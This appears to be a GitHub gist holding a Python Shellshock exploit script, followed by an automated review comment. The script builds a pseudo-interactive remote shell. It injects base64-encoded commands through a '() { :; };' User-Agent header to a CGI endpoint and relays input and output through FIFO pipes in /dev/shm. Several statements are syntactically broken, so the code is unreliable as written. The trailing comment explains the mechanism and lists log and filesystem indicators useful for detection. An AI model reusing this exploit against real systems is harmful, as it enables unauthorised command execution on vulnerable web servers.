Created
November 18, 2018 17:45
RomaniukVadim created this gist
Nov 18, 2018
@@ -0,0 +1,65 @@ import requests import time from base64 import b64encode from random import randrange import threading class AllTheReads(object): def __init__(self, interval=1): self.interval = interval thread = threading.Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): readoutput = """/bin/cat %s""" % (stdout) clearoutput = """echo '' > %s """ % (stdout) while True: output = RunCmd(readoutput) if output: RunCmd(clearoutput) time.sleep(self.interval) def RunCmd(cmd): cmd = cmd.encode('utf-8') cmd = b64encode(cmd).decode('utf-8') headers = { 'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d | sh'} % (cmd) } result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip() return result def WriteCmd(cmd): cmd = cmd.encode('utf-8') cmd = b64encode(cmd).decode('utf-8') headers = { 'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d > %s' (cmd, stdin) } result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip() return result def ReadCmd(cmd): output = """/bin/cat %s """ % (stdout) output = RunCmd(GetOutput) return output def SetupShell(): NamedPipes = """mkfifo %s; tail -f %s | /bin/sh 2>&1 %s """ (stdin, stdin, stdout) try: RunCmd(NamedPipes) except: None return None global stdin, stdout session = randrange(1000,9999) stdin = "/dev/shm/input.%s" % (session) stdout "/dev/shm/output.%s" % (session) clearoutput = """echo '' > %s """ % (stdout) SetupShell() ReadingTheThings = AllTheReads() while True: cmd = input("> ") WriteCmd(cmd + "\n") time.sleep(1.1)
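Review bot: The script carries no docstring or comments, so its mechanism has to be read out of the header string built in `RunCmd` and `WriteCmd`; a header comment such as `# Sends base64-encoded commands in a "() { :; };"-prefixed User-Agent to a CGI endpoint; I/O goes through FIFOs /dev/shm/input.<session> and /dev/shm/output.<session>` would state it. That prefix looks like the Shellshock bash function-import pattern, so the script presumably has an effect only on a host whose bash still imports function definitions from request-derived environment variables. For detection work the same strings are the observable artifacts: a request header beginning `() { :; };` in web-server logs, a `base64 -d` pipe into `sh`, and `mkfifo` nodes under `/dev/shm` fed by a long-running `tail -f … | /bin/sh`, none of which the script removes. As shown, several statements are not valid Python, so the listing reads as an unfinished transcription rather than a tested file.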